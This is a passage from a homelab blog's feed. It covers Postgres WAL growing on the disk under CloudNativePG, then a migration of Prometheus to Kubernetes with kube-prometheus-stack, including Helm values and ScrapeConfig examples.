Nomad instance, and it clocked in at around 35MB. So I wasn&rsquo;t really that worried.
But it seems I misunderstood some things. After changing the <code>storage.size</code> option
to <code>1GB</code>, everything was fine and the DB no longer crashed.</p>
<p>But that wasn&rsquo;t the end of my confusion when it came to the storage consumption.</p>
<h2 id="unbounded-growth-over-time">Unbounded growth over time?</h2>
<p>With the initial issue fixed, I set myself a task to check the disk usage of
the DB after a couple of days. This was during a week where I didn&rsquo;t have much
time to spend on the Homelab, so I expected the database size to not change
very much.</p>
<p>The result was this, after a week of not touching the Grafana instance, which
is the only user of the DB:</p>
<figure>
    <img loading="lazy" src="disk-growth.png"
         alt="A screenshot of a time series plot. It starts out a bit over 100MB usage and goes up to 300MB quickly. After that, it grows in steps approximately every six hours by about 100MB. It tops out at over 600 MB."/> <figcaption>
            <p>DB disk volume utilization growth.</p>
        </figcaption>
</figure>

<p>I couldn&rsquo;t understand what was going on here. It wasn&rsquo;t the database itself which
was just 12MB in size throughout the entire time. Then I looked at the disk,
and saw this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>postgres@grafana-pg-cluster-1:/$ ls -lh /var/lib/postgresql/data/pgdata/pg_wal/
</span></span><span style="display:flex;"><span>total 561M
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  <span style="color:#ae81ff">338</span> Mar <span style="color:#ae81ff">17</span> 19:13 000000010000000000000003.00000028.backup
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 12:09 <span style="color:#ae81ff">000000010000000000000036</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 12:14 <span style="color:#ae81ff">000000010000000000000037</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 20:09 <span style="color:#ae81ff">000000010000000000000038</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 20:14 <span style="color:#ae81ff">000000010000000000000039</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 21:09 00000001000000000000003A
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 21:14 00000001000000000000003B
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 22:09 00000001000000000000003C
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 22:14 00000001000000000000003D
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 06:09 00000001000000000000003E
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 06:14 00000001000000000000003F
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 08:09 <span style="color:#ae81ff">000000010000000000000040</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 08:14 <span style="color:#ae81ff">000000010000000000000041</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 09:09 <span style="color:#ae81ff">000000010000000000000042</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 16:09 <span style="color:#ae81ff">000000010000000000000043</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 16:14 <span style="color:#ae81ff">000000010000000000000044</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 18:09 <span style="color:#ae81ff">000000010000000000000045</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 18:14 <span style="color:#ae81ff">000000010000000000000046</span>
</span></span><span style="display:flex;"><span>-rw-rw---- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 20:09 <span style="color:#ae81ff">000000010000000000000047</span>
</span></span><span style="display:flex;"><span>-rw-rw---- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 20:14 <span style="color:#ae81ff">000000010000000000000048</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 21:09 <span style="color:#ae81ff">000000010000000000000049</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">21</span> 21:14 00000001000000000000004A
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 02:10 00000001000000000000004B
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 02:15 00000001000000000000004C
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 04:10 00000001000000000000004D
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 08:10 00000001000000000000004E
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 08:15 00000001000000000000004F
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 09:10 <span style="color:#ae81ff">000000010000000000000050</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 12:10 <span style="color:#ae81ff">000000010000000000000051</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 12:15 <span style="color:#ae81ff">000000010000000000000052</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 14:10 <span style="color:#ae81ff">000000010000000000000053</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 14:15 <span style="color:#ae81ff">000000010000000000000054</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 19:05 <span style="color:#ae81ff">000000010000000000000055</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">22</span> 19:10 <span style="color:#ae81ff">000000010000000000000056</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 10:09 <span style="color:#ae81ff">000000010000000000000057</span>
</span></span><span style="display:flex;"><span>-rw------- <span style="color:#ae81ff">1</span> postgres tape  16M Mar <span style="color:#ae81ff">20</span> 10:14 <span style="color:#ae81ff">000000010000000000000058</span>
</span></span><span style="display:flex;"><span>drwxrws--- <span style="color:#ae81ff">2</span> postgres tape 4.0K Mar <span style="color:#ae81ff">22</span> 19:10 archive_status
</span></span></code></pre></div><p>That explained at least where the space was going. Then digging a bit into the
Postgres docs, I found the <a href="https://www.postgresql.org/docs/current/runtime-config-replication.html#GUC-WAL-KEEP-SIZE">wal_keep_size</a> config option. This option determines how much WAL is kept
around. Looking a bit further, because I certainly hadn&rsquo;t set that option, I finally
came across CloudNativePG&rsquo;s default config. And in there, <code>wal_keep_size</code> is set
to 512MB. Which happens to fit the point where the DB volume stopped growing.
See the CloudNativePG docs <a href="https://cloudnative-pg.io/documentation/current/postgresql_conf/#the-postgresql-section">here</a>.</p>
<p>Still, this seems a bit excessive to me, considering that the database itself
is only 12MB. But at least now, I know to add 512MB to the storage volume size
to account for Write Ahead Log.</p>
<p>I&rsquo;m still surprised how much WAL is produced here, even though I&rsquo;m pretty sure
that there isn&rsquo;t actually that much going on in the database.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 9: Prometheus</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-9-prometheus/</link>
      <pubDate>Fri, 15 Mar 2024 00:30:16 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-9-prometheus/</guid>
      <description>Setting up Prometheus with kube-prometheus-stack</description>
      <content:encoded><![CDATA[<p>Wherein I set up Prometheus for metrics gathering in the k8s cluster.</p>
<p>This is part 10 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Let me tell you something about me: I love metrics. And pretty charts. The more
the better. Back in 2020, setting up Prometheus+Grafana was what brought me
to Homelabbing as a hobby, instead of just a means to an end, running some
services I wanted to use.
I had just gotten an updated ISP connection and found my old FritzBox not working
anymore. Instead of just buying a newer one, I decided to try out OPNsense.
This meant that I now had two hosts in the Homelab. My old home server running
a handful of services, and the new OPNsense box. And I wanted metrics, especially
about CPU and network usage.</p>
<p>Today, my Prometheus database takes about 50 GB on disk and I&rsquo;ve got a retention
period of five years. &#x1f605;
It&rsquo;s not just host metrics anymore. I&rsquo;m also scraping thermometers and smart
plugs to monitor my home a bit.</p>
<p>One of the main things I&rsquo;m using my monitoring stack for is to analyze changes
in the noise level. My desk is right next to my server rack. And sometimes,
fans suddenly ramp up, or hard disks start seeking without me doing anything.
Then I like the ability to go to my Homelab dashboard and immediately identify
which service is likely responsible for that increase in the noise level.</p>
<p>In this post, I will go over the migration of my Prometheus setup to k8s. I
will also migrate Grafana, but to keep the post relatively short, I decided to
split the Prometheus and Grafana posts instead of handling the entire monitoring
migration in one go.</p>
<h2 id="setup">Setup</h2>
<p>For the monitoring deployment, I decided to use <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>, which I was pointed to
by multiple Homelabbers on the Fediverse while working on my first test cluster.
It is a Helm chart which is able to deploy a full monitoring stack for k8s and
contains multiple components.</p>
<p>The first component deployed is an instance of <a href="https://github.com/prometheus-operator/prometheus-operator">prometheus-operator</a>.
This operator&rsquo;s main task is to deploy one (or several) Prometheus instances.
It also supplies a number of CRDs to configure scraping for those Prometheus
instances with Kubernetes manifests, instead of manipulating the Prometheus
config file directly. The two main CRDs are <a href="https://prometheus-operator.dev/docs/operator/design/#servicemonitor">ServiceMonitors</a> and <a href="https://prometheus-operator.dev/docs/user-guides/scrapeconfig/">ScrapeConfigs</a>.
The ServiceMonitor especially is something which seems to be accepted more widely
for configuring service scraping. I&rsquo;ve already seen the ability to create
ServiceMonitors in several Helm Charts I have deployed, e.g. Ceph Rook&rsquo;s. This
way, you don&rsquo;t have to create scrape configs manually.</p>
<p>The next component deployed by the Helm chart is <a href="https://github.com/kubernetes/kube-state-metrics">kube-state-metrics</a>.
This is a component which scrapes the Kubernetes apiserver and supplies a lot
of additional information about the state of the cluster, for example detailed
info about Pods or Deployments.</p>
<p>Finally, the Helm chart can also deploy and properly configure Grafana, and
comes with a number of pre-defined dashboards for the data scraped from the
cluster. I will skip this component for now and take it up in the next post in
this series, when I&rsquo;m migrating my Grafana instance.</p>
<p>Before going on to the <code>values.yaml</code>, I also need to talk about the necessary
config for Kubernetes components. By default, most components in a <em>kubeadm</em>
cluster only listen on local ports. Most component&rsquo;s metrics were not too
interesting, with the Kube Scheduler as an exception. To make it available
for Prometheus scraping, I added the following to my <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta3/#kubeadm-k8s-io-v1beta3-ClusterConfiguration">ClusterConfiguration</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">scheduler</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">bind-address</span>: <span style="color:#ae81ff">0.0.0.0</span>
</span></span></code></pre></div><p>I disabled the scraping for the Kube Controller Manager completely, because the
metrics from it didn&rsquo;t look interesting enough to bother changing the config
after I had already set up the cluster.</p>
<p>Here is the full <code>values.yaml</code> file for the kube-prometheus-stack chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">crds</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">defaultRules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">create</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">windowsMonitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">alertmanager</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeProxy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeEtcd</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeControllerManager</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeExporter</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">prometheusOperator</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">networkPolicy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">flavor</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">networkPolicy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">flavor</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cilium</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">prometheus.example.com</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selfMonitor</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheusSpec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrapeInterval</span>: <span style="color:#ae81ff">30s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retention</span>: <span style="color:#ae81ff">5y</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">debug</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrapeConfigSelectorNilUsesHelmValues</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">700Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">900Mi</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageSpec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeClaimTemplate</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">accessModes</span>: [<span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">100Gi</span>
</span></span></code></pre></div><p>The first thing to note here is that I&rsquo;m disabling a lot of functionality.
The first one is all alerting features. I don&rsquo;t have alerting set up on my Nomad
cluster either, but I&rsquo;ve had in on my list for a long time. I will get to it
at some point. &#x1f642;</p>
<p>Next is that I&rsquo;m keeping Grafana disabled as well. For now I will use my Nomad
Grafana instance. The migration of Grafana will come in the next step.</p>
<p>Then I&rsquo;m disabling scraping of the Kubernetes proxy, because I&rsquo;ve got that
component disabled, using Cilium instead. Further, I&rsquo;ve got etcd and the Kube
Controller Manager also disabled, because I did not see anything interesting in
their metrics.
Finally, the node-exporter functionality of the chart is also disabled, because
I&rsquo;m already deploying it via Ansible on all of my nodes. And because I&rsquo;ve got
nodes, like my OPNsense box, which don&rsquo;t run Kubernetes, I decided to keep
the node-exporter config in Ansible, on the node level. This is better, having
a common config for all hosts in the Homelab, instead of having some hosts
configured via Ansible and some via this Helm chart.</p>
<p>I&rsquo;ve currently got an Ingress configured for Prometheus. This is only temporary,
while I&rsquo;m still using the Grafana deployment on Nomad. After that&rsquo;s migrated to
Kubernetes as well, there will no longer be any need for it.</p>
<p>One important thing to point out is the <code>prometheus.prometheusSpec.scrapeConfigSelectorNilUsesHelmValues</code>
option. With this option unset, the Prometheus operator will only look at
ScrapeConfig resources deployed by the Helm chart itself. But I wanted to create
the files separately (see next section).</p>
<p>Finally, I would like to leave a couple of lines here about the data migration.
As I noted above, I like pretty charts. And I like to have access to older data
as well, which is why I&rsquo;ve got a retention period of five years for Prometheus.
I was a bit apprehensive about how well the migration would go. But it turns
out that Prometheus is absolutely fine when just copying over the files from
another Prometheus instance.</p>
<p>I just copied the data files from my old Prometheus volume over to the new one
with a <code>rsync -avP /mnt/old-volume/* /mnt/new-volume/prometheus-db/</code>. The
permissions/ownership of the files doesn&rsquo;t seem to matter much, the new
Prometheus instance was fine with handling the old ownership of the files upon
restart.</p>
<h2 id="scraping">Scraping</h2>
<p>And now onto the scrape configs. In good Kubernetes style, you don&rsquo;t just create
a Prometheus config file. Instead, scrapes are configured via ServiceMonitors
and ScrapeConfigs. I won&rsquo;t go into detail on the ServiceMonitor here, as I don&rsquo;t
directly use any of it yet - it is only used behind the scenes to configure
scraping for the Kubernetes components.</p>
<p>But I did need to introduce some ScrapeConfigs to configure the k8s Prometheus
instance so that it would scrape all the targets the old instance was scraping.</p>
<p>As an example of what this looks like, here is a ScrapeConfig for the node-exporter
running on all of my hosts:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-hosts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-hosts</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">hostmetrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;my.host:9100&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">relabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__address__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;([^\:]+)\:[0-9]+&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">go_.*</span>
</span></span></code></pre></div><p>The config under <code>spec:</code> is very similar to what would be put into the
Prometheus config in a baremetal deployment. The same config would look something
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">scrape_configs</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">job_name</span>: <span style="color:#ae81ff">hostmetrics</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">static_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;my.host:9100&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">relabel_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__address__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">([^\:]+)\:[0-9]+</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">target_label</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metric_relabel_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">go_.*</span>
</span></span></code></pre></div><p>On the one hand this similarity is pretty nice. But on the other hand, the
differences, especially the switch from snake_case to camelCase, threw me off
several times.</p>
<p>Here is a more involved example with more configs, for my <a href="https://github.com/prometheus/snmp_exporter">snmp-exporter</a>,
which uses SNMP to gather metrics from my VDSL modem:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-modem</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-modems</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">modemmetrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">300.300.300.1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricsPath</span>: <span style="color:#ae81ff">/snmp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scrapeInterval</span>: <span style="color:#ae81ff">1m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">params</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">module</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">routernameHere</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">relabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__address__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__param_target</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">routerHostnameHere</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__address__</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">snmp-exporter.example.com</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">snmp_scrape_.*</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">sysName</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;adslAturCurrStatus&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">([A-Z]*).*</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">adslAturCurrStatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">${1}</span>
</span></span></code></pre></div><p>This is just to demonstrate that the ScrapeConfig supports most of the options
which are supported in the Prometheus config file. In the operator docs, they&rsquo;re
